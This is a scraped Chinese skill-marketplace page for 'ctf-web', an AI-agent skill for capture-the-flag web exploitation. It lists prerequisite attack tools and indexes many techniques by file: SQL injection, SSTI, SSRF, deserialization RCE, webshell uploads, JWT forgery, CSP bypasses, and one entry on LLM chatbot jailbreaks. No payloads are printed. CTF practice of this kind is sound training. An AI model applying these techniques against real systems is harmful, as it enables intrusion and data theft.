</code>/app/flag.txt<code>, </code>/home/</em>/flag<em><code>. Env: </code>/proc/self/environ<code>. DB: </code>flag<code>, </code>flags<code>, </code>secret<code> tables. Headers: </code>x-flag<code>, </code>x-archive-tag<code>, </code>x-proof<code>. DOM: </code>display:none<code> elements, </code>data-</em>` attributes.</p></div> <div class="desc-cn"><h1>CTF Web 漏洞利用</h1> <p>Web CTF挑战的快速参考。每种技术在此处有一行说明；有关有效载荷和代码的完整详细信息，请参见支持文件。</p> <h2>先决条件</h2> <p><strong>Python 包（所有平台）：</strong><br> bash<br> pip install sqlmap flask-unsign requests</p> <p><strong>Linux (apt)：</strong><br> bash<br> apt install hashcat jq curl</p> <p><strong>macOS (Homebrew)：</strong><br> bash<br> brew install hashcat jq curl</p> <p><strong>Go 工具（所有平台，需要 Go）：</strong><br> bash<br> go install github.com/ffuf/ffuf/v2@latest</p> <p><strong>手动安装：</strong><br> <ul><li>- ysoserial — <a href="https://github.com/frohoff/ysoserial" target="_blank" rel="noopener">GitHub</a>，需要 Java（Java 反序列化有效载荷）</li></ul></p> <h2>附加资源</h2> <ul><li>- <a href="sql-injection.md" target="<em>blank" rel="noopener">sql-injection.md</a> - SQL 注入技术：反斜杠/十六进制绕过、二阶 SQLi、LIKE 暴力破解、MySQL 列截断、SQLi→SSTI 链、processList 技巧、XML 实体 WAF 绕过、EXIF 元数据注入、Shift-JIS 编码绕过、二维码输入注入、双关键字过滤器绕过、MySQL 会话变量双值注入、PHP PCRE 回溯 WAF 绕过、processlist 竞态条件泄露</li><li><a href="server-side.md" target="</em>blank" rel="noopener">server-side.md</a> - 核心服务端注入攻击：SSTI（Jinja2、Go、EJS、ERB Sequel 绕过、Mako、Twig、<strong>dict</strong>.update() 引号绕过）、Python str.format() 属性遍历、SSRF（Host 头、DNS 重绑定、curl 重定向）、XXE、通过 X-Forwarded-For 头的 XML 注入、命令注入（换行、黑名单绕过、sendmail、多条形码、git CLI 换行注入）、PHP 类型混淆、PHP 文件包含 / php://filter、GraphQL 注入（内省、查询批处理/别名、字符串插值）</li><li><a href="server-side-exec.md" target="<em>blank" rel="noopener">server-side-exec.md</a> - 代码执行和服务端访问攻击：Ruby/Perl/JS 代码注入、LaTeX 注入 RCE、PHP preg</em>replace /e RCE、PHP 反引号 eval（字符限制下）、PHP assert() 注入、Prolog 注入、ReDoS 时间预言、文件上传→RCE（.htaccess、日志投毒、Python .so 劫持、Gogs 符号链接、ZipSlip）、来自 Cookie 的 PHP 反序列化、PHP extract() 变量覆盖、XPath 盲注入、API 过滤器注入、HTTP 响应头隐藏、WebSocket 批量赋值、Thymeleaf SpEL SSTI + Spring FileCopyUtils WAF 绕过</li><li><a href="server-side-exec-2.md" target="<em>blank" rel="noopener">server-side-exec-2.md</a> - 代码执行和服务端访问攻击（第 2 部分）：SQLi 关键字碎片绕过、SQL WHERE ORDER BY 绕过、通过 DNS 记录的 SQL 注入、bash 花括号展开无空格注入、Common Lisp #.() 读取器宏注入、PHP7 OPcache 二进制 webshell + LD</em>PRELOAD disable<em>functions 绕过、wget GET 参数文件名技巧、tar 文件名命令注入、PNG/PHP 多语言上传 + 双扩展名 + disable</em>functions 绕过、编辑器备份文件源码泄露、date -f 任意文件读取、Apache mod<em>rewrite PATH</em>INFO 绕过、PHP ReDoS 代码执行跳过</li><li><a href="server-side-deser.md" target="<em>blank" rel="noopener">server-side-deser.md</a> - 反序列化和执行攻击：Java 反序列化（ysoserial gadget 链、JNDI 注入、盲检测）、Python pickle RCE（<strong>reduce</strong>、受限 unpickler 绕过、STOP 操作码链）、通过过滤器词扩展的 PHP 序列化长度操纵、竞态条件（TOCTOU 异步利用、双花、优惠券重用）</li><li><a href="server-side-advanced.md" target="</em>blank" rel="noopener">server-side-advanced.md</a> - 高级服务端技术：ExifTool CVE-2021-22204、Go rune/byte 不匹配、zip 符号链接遍历、路径遍历绕过（花括号剥离、双重 URL 编码、os.path.join、%2f）、/dev/fd 符号链接绕过 /proc 过滤器、Flask/Werkzeug 调试模式、XXE 外部 DTD 过滤器绕过、WeasyPrint SSRF、MongoDB 正则注入、Pongo2 Go 模板注入、ZIP PHP webshell、basename() 绕过、React Server Components Flight RCE（CVE-2025-55182）</li><li><a href="server-side-advanced-2.md" target="<em>blank" rel="noopener">server-side-advanced-2.md</a> - 高级服务端技术（第 2 部分）：SSRF 到 Docker API RCE 链、Castor XML xsi:type 反序列化（Atlas HTB）、Apache ErrorDocument 表达式文件读取（Zero HTB）、SQLite 文件路径遍历绕过字符串相等性、通过不间断空格的 HQL 注入、base64 编码的路径遍历、Windows 8.3 短文件名绕过、URL parse</em>url @ 符号绕过、通过 PNG/ZIP 多语言的 PHP zip:// 包装器 LFI、通过 Flask 错误页面的 XSS 到 SSTI 链、INSERT INTO 双字段 SQLi 列移位、通过时间戳种子 PRNG 的会话 Cookie 伪造、通过 parse<em>url/curl 双 @ URL 解析差异的 SSRF、通过 mpost 受限 write18 绕过的 LaTeX RCE、通过 SSRF 的 ElasticSearch Groovy script</em>fields RCE</li><li><a href="client-side.md" target="<em>blank" rel="noopener">client-side.md</a> - 客户端攻击：XSS、CSRF、CSPT、缓存投毒、DOM 技巧、React 输入填充、隐藏元素、XS-Leak 时间预言、GraphQL CSRF、管理员机器人 javascript: URL 方案绕过、通过 charAt/trim 覆盖的 AngularJS 1.x 沙箱逃逸、影子 DOM XSS、DOM 污染、HTTP 请求走私、JPEG+HTML 多语言 XSS、JSFuck 解码、CSS/JS 付费墙绕过</li><li><a href="client-side-advanced.md" target="</em>blank" rel="noopener">client-side-advanced.md</a> - 高级客户端攻击：Unicode 大小写折叠 XSS 绕过（长 s U+017F）、CSS 字体字形容器查询数据泄露、Hyperscript CDN CSP 绕过、PBKDF2 前缀时间预言、通过泄露的 JS 密钥的客户端 HMAC 绕过、终端控制字符混淆、通过云函数白名单域名的 CSP 绕过、通过 base 标签劫持的 CSP nonce 绕过、通过 JSONP 回调泄露的 XSSI、通过链接预取的 CSP 绕过、通过共享父域 Cookie 注入的跨源 XSS、Chrome Unicode URL 规范化绕过、通过十进制 IP 和括号表示法的 XSS 点过滤器绕过</li><li><a href="auth-and-access.md" target="<em>blank" rel="noopener">auth-and-access.md</a> - 认证/授权攻击：密码推断、弱验证、客户端门控、NoSQL 认证绕过、Cookie 操纵、管理员登录路由 Cookie 种子、Host 头绕过、始终为真的哈希检查、仿射密码 OTP 暴力破解、通过 HTTP Range 请求的 /proc/self/mem、自定义线性 MAC 伪造、隐藏 API 端点、HAProxy/Express.js 绕过、WIP 端点上的 IDOR、HTTP TRACE 方法绕过、LLM/AI 聊天机器人越狱、LLM 安全模型类别差距、开放重定向链（OAuth 令牌窃取）、子域名接管、Apache mod</em>status 信息泄露 + 会话伪造、JA4/JA4H TLS 指纹匹配</li><li><a href="auth-jwt.md" target="<em>blank" rel="noopener">auth-jwt.md</a> - JWT/JWE 令牌攻击：算法 none、RS256→HS256 混淆、弱密钥、未验证签名、JWK/JKU 头注入、KID 路径遍历、余额重放、使用暴露公钥的 JWE 伪造</li><li><a href="auth-infra.md" target="</em>blank" rel="noopener">auth-infra.md</a> - 基础设施认证：OAuth/OIDC 利用（redirect<em>uri 绕过、令牌操纵、state CSRF）、CORS 配置错误、git 历史凭据泄露、CI/CD 变量窃取、身份提供商 API 接管（authentik/Keycloak）、SAML SSO 流程自动化、Guacamole 参数提取、登录页面投毒、TeamCity REST API RCE、base64 解码宽容性签名绕过</li><li><a href="node-and-prototype.md" target="</em>blank" rel="noopener">node-and-prototype.md</a> - Node.js：原型污染、VM 沙箱逃逸、Happy-DOM 链、flatnest CVE、Lodash+Pug AST 注入</li><li><a href="web3.md" target="<em>blank" rel="noopener">web3.md</a> - 区块链/Web3：Solidity 漏洞利用、代理模式、ABI 编码技巧、瞬态存储清除碰撞（0.8.28-0.8.33）、Foundry 工具</li><li><a href="cves.md" target="</em>blank" rel="noopener">cves.md</a> - CVE 特定漏洞利用：Next.js 中间件绕过、curl 凭据泄露、Uvicorn CRLF、urllib 方案绕过、</li></ul></div> </div> <div class="tags"> <h4>标签</h4> <span class="tag">skill</span> <span class="tag">ai</span> </div> </div> </div> <div class="tab-content" id="tab-install"> <div class="install-panel"> <h3>通过对话安装</h3> <p>该技能支持在以下平台通过对话安装：</p> <div class="platform-list"> <span class="platform-tag">OpenClaw</span> <span class="platform-tag">WorkBuddy</span> <span class="platform-tag">QClaw</span> <span class="platform-tag">Kimi</span> <span class="platform-tag">Claude</span> </div> <div class="install-method"> <h4>方式一：安装 SkillHub 和技能</h4> <div class="code-block"> <button class="copy-btn" onclick="copyToClipboard('帮我安装 SkillHub 和 ctf-web-1775932943 技能', this)">复制</button> <code>帮我安装 SkillHub 和 ctf-web-1775932943 技能</code> </div> </div> <div class="install-method"> <h4>方式二：设置 SkillHub 为优先技能安装源</h4> <div class="code-block"> <button class="copy-btn" onclick="copyToClipboard('设置 SkillHub 为我的优先技能安装源，然后帮我安装 ctf-web-1775932943 技能', this)">复制</button> <code>设置 SkillHub 为我的优先技能安装源，然后帮我安装 ctf-web-1775932943 技能</code> </div> </div> <h3 style="margin-top: 30px;">通过命令行安装</h3> <div class="install-method"> <div class="code-block"> <button class="copy-btn" onclick="copyToClipboard('skillhub install ctf-web-1775932943', this)">复制</button> <code>skillhub install ctf-web-1775932943</code> </div> </div> <h3 style="margin-top: 30px;">下载</h3> <a href="plugin.php?id=hl_skillhub&mod=download&version_id=1056&token=84b5dd616f03c5e8173101e04ce7af73" class="download-btn"> ⬇ 下载 ctf-web v1.0.0（免费） </a> <p class="download-info"> 文件大小: 127.36 KB | 发布时间: 2026-4-12 09:38 </p> </div> </div> <div class="tab-content" id="tab-versions"> <div class="version-list"> <div class="version-item"> <div class="version-header"> <span class="version-number">v1.0.0</span> <span class="latest-tag">最新</span> <span class="version-date">2026-4-12 09:38</span> </div> <div class="changelog"> Initial release of ctf-web skill. <br /> - Provides web exploitation techniques for CTF challenges: XSS, SQLi, SSTI, SSRF, CSRF, XXE, file upload bypasses, JWT attacks, prototype pollution, path traversal, command injection, auth bypass, SAML/OAuth exploitation, subdomain takeover, more.<br /> - Includes quick reference plus detailed supporting files for a wide range of web attack techniques.<br /> - Lists prerequisite tools and resources for common CTF platforms (Python, Linux, macOS, Go).<br /> - Organizes content by attack type: server/client-side, authentication, Node.js, Web3, CVEs, and advanced techniques.<br /> - For use with filesystem-enabled agents (e.g. Claude Code) with Bash and Python 3. </div> </div> </div> </div>  <div class="related-skills"> <h3>相关推荐</h3> <div class="skill-list-related"> <div class="skillhub-card-related"> <a href="plugin.php?id=hl_skillhub&mod=detail&slug=self-improving-agent-1776396682"> <div class="skill-icon"> <div class="default-icon">s</div> </div> <h3 class="skill-name">self-improvement</h3> <p class="skill-desc">Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Claude ('No, that's wrong...', 'Actually...'), (3) User requests a capability that doesn't exist, (4) An external API or tool fails, (5) Claude realizes its knowledge is outdated or incorrect, (6) A better approach is discovered for a recurring task. Also review learnings before major tasks.</p> <div class="skill-meta"> <div class="stats"> <span>⭐ 3209</span> <span>⬇ 392958</span> </div> <span class="skill-source">AI智能</span> </div> </a> </div> <div class="skillhub-card-related"> <a href="plugin.php?id=hl_skillhub&mod=detail&slug=self-improving-agent-1776382578"> <div class="skill-icon"> <div class="default-icon">s</div> </div> <h3 class="skill-name">self-improvement</h3> <p class="skill-desc">Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Claude ('No, that's wrong...', 'Actually...'), (3) User requests a capability that doesn't exist, (4) An external API or tool fails, (5) Claude realizes its knowledge is outdated or incorrect, (6) A better approach is discovered for a recurring task. Also review learnings before major tasks.</p> <div class="skill-meta"> <div class="stats"> <span>⭐ 3209</span> <span>⬇ 392957</span> </div> <span class="skill-source">AI智能</span> </div> </a> </div> <div class="skillhub-card-related"> <a href="plugin.php?id=hl_skillhub&mod=detail&slug=self-improving-agent-1776282374"> <div class="skill-icon"> <div class="default-icon">s</div> </div> <h3 class="skill-name">self-improvement</h3> <p class="skill-desc">Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Claude ('No, that's wrong...', 'Actually...'), (3) User requests a capability that doesn't exist, (4) An external API or tool fails, (5) Claude realizes its knowledge is outdated or incorrect, (6) A better approach is discovered for a recurring task. Also review learnings before major tasks.</p> <div class="skill-meta"> <div class="stats"> <span>⭐ 3195</span> <span>⬇ 389589</span> </div> <span class="skill-source">AI智能</span> </div> </a> </div> <div class="skillhub-card-related"> <a href="plugin.php?id=hl_skillhub&mod=detail&slug=self-improving-agent-1776190579"> <div class="skill-icon"> <div class="default-icon">s</div> </div> <h3 class="skill-name">self-improvement</h3> <p class="skill-desc">Captures learnings, errors, and corrections to enable continuous improvement. Use when: (1) A command or operation fails unexpectedly, (2) User corrects Claude ('No, that's wrong...', 'Actually...'), (3) User requests a capability that doesn't exist, (4) An external API or tool fails, (5) Claude realizes its knowledge is outdated or incorrect, (6) A better approach is discovered for a recurring task. Also review learnings before major tasks.</p> <div class="skill-meta"> <div class="stats"> <span>⭐ 3177</span> <span>⬇ 386644</span> </div> <span class="skill-source">AI智能</span> </div> </a> </div> </div> </div> </div> </div> <style> .skill-detail { padding: 20px 0; min-height: 100vh; } .breadcrumb { margin-bottom: 20px; color: #666; } .breadcrumb a { color: #155BD5; } .breadcrumb span { margin: 0 5px; } .skill-detail-header { display: flex; gap: 24px; padding: 30px; background: #fff; border-radius: 12px; margin-bottom: 20px; border: 1px solid #e8e8e8; } .skill-icon-large { width: 120px; height: 120px; flex-shrink: 0; } .skill-icon-large img { width: 100%; height: 100%; border-radius: 20px; object-fit: cover; } .skill-icon-large .default-icon-large { width: 100%; height: 100%; border-radius: 20px; background: #155BD5; color: #fff; display: flex; align-items: center; justify-content: center; font-size: 48px; font-weight: bold; } .skill-info { flex: 1; } .skill-header-action { flex-shrink: 0; display: flex; align-items: center; padding-left: 20px; } .header-download-btn { display: inline-flex; align-items: center; gap: 8px; padding: 12px 24px; background: #155BD5; color: #fff; border-radius: 8px; text-decoration: none; font-size: 14px; font-weight: 500; transition: all 0.2s ease; white-space: nowrap; } .header-download-btn:hover { background: #0d4bb5; transform: translateY(-1px); box-shadow: 0 4px 12px rgba(21, 91, 213, 0.3); } .header-download-btn.buy { background: #f97316; } .header-download-btn.buy:hover { background: #ea580c; box-shadow: 0 4px 12px rgba(249, 115, 22, 0.3); } .skill-info h1 { font-size: 36px; font-weight: 700; color: #1e293b; margin-bottom: 10px; display: flex; align-items: center; flex-wrap: wrap; gap: 12px; } .skill-info h1 .name-cn { font-size: 20px; color: #666; font-weight: 500; background: #f1f5f9; padding: 4px 14px; border-radius: 20px; white-space: nowrap; } .skill-info .skill-desc { font-size: 16px; color: #666; margin-bottom: 8px; } .skill-info .skill-scenarios { font-size: 14px; color: #999; margin-bottom: 10px; } .skill-info .skill-author { font-size: 13px; color: #999; } /* 统计面板 */ .stats-panel { display: flex; align-items: center; background: #fff; border-radius: 12px; padding: 24px 0; margin-bottom: 24px; border: 1px solid #e8e8e8; box-shadow: 0 1px 3px rgba(0,0,0,0.05); } .stats-panel .stats-item { flex: 1; text-align: center; padding: 0 16px; } .stats-panel .stats-divider { width: 1px; height: 48px; background: linear-gradient(180deg, transparent, #e8e8e8, transparent); } .stats-panel .stats-icon { width: 40px; height: 40px; margin: 0 auto 8px; border-radius: 50%; display: flex; align-items: center; justify-content: center; font-size: 18px; background: #f1f5f9; color: #64748b; } .stats-panel .stats-icon.source-icon { background: #e0e7ff; color: #6366f1; } .stats-panel .stats-icon.version-icon { background: #fef3c7; color: #d97706; } .stats-panel .stats-icon.security-icon { background: #fee2e2; color: #9ca3af; } .stats-panel .stats-icon.security-icon.verified { background: #d1fae5; color: #10b981; } .stats-panel .stats-value { font-size: 15px; font-weight: 600; color: #374151; margin-bottom: 4px; } .stats-panel .stats-number { font-size: 24px; font-weight: 700; color: #111827; margin-bottom: 4px; line-height: 1.2; } .stats-panel .stats-label { font-size: 13px; color: #9ca3af; } .stats-panel .stats-item.highlight .stats-label { color: #6b7280; } .skill-tabs { display: flex; gap: 40px; border-bottom: 1px solid #e8e8e8; margin-bottom: 20px; } .skill-tabs .tab-item { padding: 15px 0; color: #666; cursor: pointer; border-bottom: 2px solid transparent; font-size: 16px; } .skill-tabs .tab-item.active { color: #155BD5; border-bottom-color: #155BD5; } .tab-content { background: #fff; border-radius: 12px; padding: 30px; margin-bottom: 20px; border: 1px solid #e8e8e8; opacity: 0; transform: translateY(10px); transition: all 0.3s ease; display: none; } .tab-content.active { opacity: 1; transform: translateY(0); display: block; } .lang-switcher { display: flex; gap: 8px; margin-bottom: 16px; justify-content: flex-end; } .lang-switcher .lang-btn { padding: 4px 16px; border: 1px solid #d1d5db; background: #fff; border-radius: 20px; font-size: 13px; color: #6b7280; cursor: pointer; transition: all 0.2s; } .lang-switcher .lang-btn:hover { border-color: #155BD5; color: #155BD5; } .lang-switcher .lang-btn.active { background: #155BD5; color: #fff; border-color: #155BD5; } .overview-content h3 { margin-bottom: 15px; } /* Markdown 预览样式 */ .markdown-body { line-height: 1.8; color: #333; margin-bottom: 20px; } .markdown-body h1, .markdown-body h2, .markdown-body h3, .markdown-body h4, .markdown-body h5, .markdown-body h6 { margin-top: 24px; margin-bottom: 16px; font-weight: 600; line-height: 1.25; color: #1e293b; } .markdown-body h1 { font-size: 2em; border-bottom: 1px solid #e8e8e8; padding-bottom: 8px; } .markdown-body h2 { font-size: 1.5em; border-bottom: 1px solid #e8e8e8; padding-bottom: 8px; } .markdown-body h3 { font-size: 1.25em; } .markdown-body p { margin-bottom: 16px; } .markdown-body ul, .markdown-body ol { padding-left: 2em; margin-bottom: 16px; } .markdown-body li { margin-bottom: 4px; } .markdown-body code { padding: 2px 6px; background: #f1f5f9; border-radius: 4px; font-family: 'Consolas', monospace; font-size: 0.9em; color: #155BD5; } .markdown-body pre { padding: 16px; background: #1e1e1e; border-radius: 8px; overflow-x: auto; margin-bottom: 16px; } .markdown-body pre code { background: transparent; color: #d4d4d4; padding: 0; } .markdown-body blockquote { padding: 0 1em; border-left: 4px solid #155BD5; color: #666; margin-bottom: 16px; } .markdown-body table { width: 100%; border-collapse: collapse; margin-bottom: 16px; } .markdown-body th, .markdown-body td { padding: 8px 12px; border: 1px solid #e8e8e8; } .markdown-body th { background: #f8f9fa; font-weight: 600; } .markdown-body a { color: #155BD5; text-decoration: none; } .markdown-body a:hover { text-decoration: underline; } .markdown-body img { max-width: 100%; border-radius: 8px; } .overview-content .tags { margin-top: 20px; } .overview-content .tags h4 { margin-bottom: 10px; } .overview-content .tag { display: inline-block; padding: 4px 12px; background: #f0f0f0; border-radius: 4px; margin-right: 8px; margin-bottom: 8px; font-size: 13px; } .install-panel h3 { margin-bottom: 15px; } .platform-list { margin-bottom: 20px; } .platform-tag { display: inline-block; padding: 4px 12px; background: #e3f2fd; color: #1976d2; border-radius: 4px; margin-right: 8px; font-size: 13px; } .install-method { margin-bottom: 25px; } .install-method h4 { margin-bottom: 10px; font-size: 14px; color: #666; } .code-block { position: relative; background: #1e1e1e; border-radius: 8px; padding: 16px 60px 16px 16px; } .code-block code { color: #d4d4d4; font-family: 'Consolas', monospace; font-size: 14px; } .copy-btn { position: absolute; right: 12px; top: 50%; transform: translateY(-50%); padding: 4px 12px; background: #333; border: none; border-radius: 4px; color: #fff; cursor: pointer; font-size: 12px; } .copy-btn:hover { background: #444; } .copy-btn.copied { background: #10b981 !important; animation: copyPulse 0.3s ease; } @keyframes copyPulse { 0%, 100% { transform: translateY(-50%) scale(1); } 50% { transform: translateY(-50%) scale(1.1); } } .download-btn { display: inline-block; padding: 12px 24px; background: #155BD5; color: #fff; border-radius: 8px; text-decoration: none; font-size: 14px; } .download-btn:hover { background: #0d4bb5; } .download-info { margin-top: 10px; font-size: 13px; color: #999; } .version-list .version-item { padding: 20px 0; border-bottom: 1px solid #e8e8e8; } .version-list .version-item:last-child { border-bottom: none; } .version-header { display: flex; align-items: center; gap: 10px; margin-bottom: 10px; } .version-header .version-number { font-size: 18px; font-weight: 600; } .version-header .latest-tag { padding: 2px 8px; background: #e8f5e9; color: #4caf50; border-radius: 4px; font-size: 12px; } .version-header .version-date { margin-left: auto; color: #999; font-size: 13px; } .changelog { color: #666; line-height: 1.6; } /* 相关推荐 */ .related-skills { margin-top: 40px; padding: 24px; background: #fff; border-radius: 12px; border: 1px solid #e8e8e8; } .related-skills h3 { margin-bottom: 20px; font-size: 18px; font-weight: 600; color: #1e293b; display: flex; align-items: center; gap: 8px; } .related-skills h3:before { content: ''; width: 4px; height: 20px; background: #155BD5; border-radius: 2px; } .skill-list-related { display: grid; grid-template-columns: repeat(auto-fill, minmax(240px, 1fr)); gap: 20px; } .skillhub-card-related { border-radius: 16px; padding: 20px; transition: all 0.3s ease; background: rgba(255, 255, 255, 0.95); backdrop-filter: blur(10px); border: 1px solid rgba(0, 0, 0, 0.08); box-shadow: 0 1px 3px rgba(0,0,0,0.05), 0 4px 12px rgba(0,0,0,0.03); } .skillhub-card-related:hover { box-shadow: 0 8px 24px rgba(21, 91, 213, 0.15); transform: translateY(-4px); } .skillhub-card-related:active { transform: scale(0.98); } .skillhub-card-related a { color: inherit; text-decoration: none; } .skillhub-card-related .skill-icon { width: 56px; height: 56px; margin-bottom: 12px; } .skillhub-card-related .skill-icon .default-icon { width: 100%; height: 100%; border-radius: 12px; background: #155BD5; color: #fff; display: flex; align-items: center; justify-content: center; font-size: 24px; font-weight: bold; } .skillhub-card-related .skill-name { font-size: 16px; font-weight: 600; margin-bottom: 8px; color: #333; } .skillhub-card-related .skill-desc { font-size: 13px; color: #666; line-height: 1.5; overflow: hidden; text-overflow: ellipsis; display: -webkit-box; -webkit-line-clamp: 2; -webkit-box-orient: vertical; margin-bottom: 12px; min-height: 39px; } .skillhub-card-related .skill-meta { display: flex; justify-content: space-between; align-items: center; font-size: 12px; color: #999; } .skillhub-card-related .skill-meta .stats { display: flex; gap: 12px; } .skillhub-card-related .skill-source { background: #f0f0f0; padding: 2px 10px; border-radius: 12px; font-size: 12px; } @media screen and (max-width: 768px) { .skill-detail-header { flex-direction: column; text-align: center; padding: 24px 20px; } .skill-icon-large { width: 80px; height: 80px; } .skill-icon-large .default-icon-large { font-size: 32px; } .skill-info h1 { font-size: 24px; } .skill-info h1 .name-cn { font-size: 14px; padding: 2px 10px; margin-left: 0; margin-top: 6px; } .skill-header-action { padding-left: 0; padding-top: 16px; width: 100%; justify-content: center; } .header-download-btn { width: 100%; justify-content: center; max-width: 280px; } .stats-panel { flex-wrap: wrap; padding: 16px 0; } .stats-panel .stats-item { flex: 1 1 30%; min-width: 80px; padding: 12px 8px; } .stats-panel .stats-divider { width: 1px; height: 36px; } .stats-panel .stats-icon { width: 32px; height: 32px; font-size: 14px; } .stats-panel .stats-number { font-size: 18px; } .stats-panel .stats-value { font-size: 13px; } .stats-panel .stats-label { font-size: 11px; } .skill-tabs { overflow-x: auto; gap: 24px; -webkit-overflow-scrolling: touch; } .skill-tabs .tab-item { white-space: nowrap; } .code-block { padding: 16px 50px 16px 16px; } .code-block code { font-size: 12px; word-break: break-all; } } /* Paid skill notice */ .paid-notice { text-align: center; padding: 40px 24px; background: linear-gradient(135deg, #fff7ed, #ffedd5); border-radius: 12px; border: 1px solid #fed7aa; } .paid-notice-icon { width: 56px; height: 56px; margin: 0 auto 16px; background: #fff; border-radius: 50%; display: flex; align-items: center; justify-content: center; font-size: 28px; color: #f97316; box-shadow: 0 2px 8px rgba(249,115,22,0.15); } .paid-notice h3 { font-size: 20px; color: #9a3412; margin-bottom: 8px; } .paid-notice p { font-size: 14px; color: #c2410c; margin: 4px 0; } .paid-buy-box { padding: 20px; background: #fff7ed; border-radius: 8px; border: 1px solid #fed7aa; margin-bottom: 12px; } .paid-buy-box p { color: #7c2d12; font-size: 15px; margin: 0; }</style> <script> // 复制功能 function copyToClipboard(text, btn) { if (navigator.clipboard && navigator.clipboard.writeText) { navigator.clipboard.writeText(text).then(function() { showCopied(btn); }).catch(function() { fallbackCopy(text, btn); }); } else { fallbackCopy(text, btn); } } function fallbackCopy(text, btn) { var textarea = document.createElement('textarea'); textarea.value = text; textarea.style.position = 'fixed'; textarea.style.opacity = '0'; document.body.appendChild(textarea); textarea.select(); try { document.execCommand('copy'); showCopied(btn); } catch (err) { btn.textContent = '失败'; } document.body.removeChild(textarea); } function showCopied(btn) { var originalText = btn.textContent; btn.textContent = '已复制!'; btn.classList.add('copied'); setTimeout(function() { btn.textContent = originalText; btn.classList.remove('copied'); }, 2000); } // Tab 切换 document.addEventListener('DOMContentLoaded', function() { var tabItems = document.querySelectorAll('.skill-tabs .tab-item'); var tabContents = document.querySelectorAll('.tab-content'); tabItems.forEach(function(item) { item.addEventListener('click', function() { var target = this.getAttribute('data-tab'); var targetContent = document.getElementById('tab-' + target); // 移除所有 active tabItems.forEach(function(t) { t.classList.remove('active'); }); tabContents.forEach(function(c) { c.classList.remove('active'); }); // 添加 active this.classList.add('active'); // 延迟添加动画类，确保过渡效果 setTimeout(function() { targetContent.classList.add('active'); }, 50); window.location.hash = target; }); }); var hash = window.location.hash.replace('#', ''); if (hash) { var targetTab = document.querySelector('.skill-tabs .tab-item[data-tab="' + hash + '"]'); if (targetTab) { targetTab.click(); } } // 中英文描述切换 var langSwitcher = document.getElementById('langSwitcher'); if (langSwitcher) { var descEn = document.querySelector('#markdownContent .desc-en'); var descCn = document.querySelector('#markdownContent .desc-cn'); var toggleBtn = document.getElementById('langToggleBtn'); var currentLang = 'cn'; toggleBtn.addEventListener('click', function() { if (currentLang === 'en') { currentLang = 'cn'; toggleBtn.textContent = 'English'; if (descEn) descEn.style.display = 'none'; if (descCn) descCn.style.display = 'block'; } else { currentLang = 'en'; toggleBtn.textContent = '中文'; if (descCn) descCn.style.display = 'none'; if (descEn) descEn.style.display = 'block'; } }); } }); </script></div> <script src="source/plugin/hl_skillhub/static/js/main.js"></script><script src="plugin.php?id=veryviews&hash=d979b36f2e6ba2fec3d8a79d0c05a919" type="text/javascript"></script><div style="height:299px; overflow:hidden" class="cl"> <div class="hl_footer cl"> <div class="hl_fttop cl"> <div class="w1180 cl"> <div class="hl_ftl" style=" position: relative;"> <ul> <li> <div class="hl_h5">闲社论坛</div> <a href="category-43.html" target="_blank">关于我们</a> <a href="/vip/" target="_blank">会员介绍</a> <a href="forum-99-1.html">开通会员</a> <a href="forum-98-1.html" target="_blank">羊毛论坛</a> </li> <li> <div class="hl_h5">闲社论坛</div> <a href="category-43.html" target="_blank">羊毛交流论坛</a> <a href="/vip/" target="_blank">线报讨论社区</a> <a href="forum-99-1.html">优惠分享交流</a> <a href="forum-98-1.html" target="_blank">线报更新服务</a> </li> <li> <div class="hl_h5">网站服务</div> <a href="https://wpa.qq.com/msgrd?v=3&uin=515151560&site=qq&menu=yes" target="_blank" rel="nofollow">会员咨询：515151560</a> <a href="https://wpa.qq.com/msgrd?v=3&uin=515151570&site=qq&menu=yes" target="_blank" rel="nofollow">广告合作：515151570</a> <a href="https://wpa.qq.com/msgrd?v=3&uin=515151580&site=qq&menu=yes" target="_blank" rel="nofollow">投诉建议：515151580</a> <a href="https://wpa.qq.com/msgrd?v=3&uin=515151590&site=qq&menu=yes" target="_blank" rel="nofollow">售后指导：515151590</a> </li> <div class="clear"></div> </ul> <p style="font-size: 16px;color: #fff;width: 370px;text-align: center;margin-top: 5px;position: absolute; left:0px; bottom:0px"> 多链集团旗下-闲社网</p> </div> <div class="hl_ftm"> <div class="hl_h5">闲社网热线 </div> <div class="hl_h2">免费联系电话 </div> <div class="hl_fttel"> 0527-80111111 </div> <h6 class="cl mtm hl_time"><a href="http://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzkzODA1MTM1NF80NjQ5NDZfNDAwMDgwOTkxMV8yXw" target="_blank" rel="nofollow"><img src="template/xianshe/neoconex/qqline.png"></a>            <a href="http://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzkzODA1MTM1NF80NjQ5NDZfNDAwMDgwOTkxMV8yXw" target="_blank" rel="nofollow"><img alt="qqline" title="qqline" src="template/xianshe/neoconex/qqline.png"></a></h6> <p class="hl_time">服务时间：周一到周日 8:00-24:00</p> </div> <div class="hl_ftl"> <ul> <li> <div class="hl_h5">公众号</div> <span style="font-size:18px;color: #fff;display: block;">闲社</span> <span style="font-size:18px;color: #fff;">闲社线报社区</span> </li> <div class="clear"></div> </ul> </div> <div class="hl_ftr"> <div class="hl_h5">关注闲社网</div> <div class="hl_guznzhuxx"> <ul> <li> <img alt="wxkf" title="wxkf" src="template/xianshe/neoconex/wxkf.jpg"> <p>闲社在线客服</p> </li> <li> <img alt="wx" title="wx" src="template/xianshe/neoconex/wx.jpg"> <p>关注闲社网微信</p> </li> <li style=" margin-right: 0;"> <img alt="app" title="app" src="template/xianshe/neoconex/app.png"> <p>闲社网APP</p> </li> <div class="clear"></div> </ul> </div> </div> <div class="clear"></div> </div> </div> </div> <div class="hl_ftbottom"> <div class="w1180 cl"> <div class="hl_ftblt"> <p> <a href="archiver/" rel="nofollow">Archiver</a><span>·</span><a href="forum.php?mobile=yes" rel="nofollow">手机版</a><span>·</span><span>闲社网·闲社论坛·羊毛社区· 多链控股集团有限公司</span> <span>·</span> <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow">苏ICP备2025199260号-1</a></p> <p> Powered by <a href="http://www.discuz.net" target="_blank" rel="nofollow">Discuz!</a> <em>X5.0</em>   © 2024-2025 <a href="https://www.xianshe.com/" 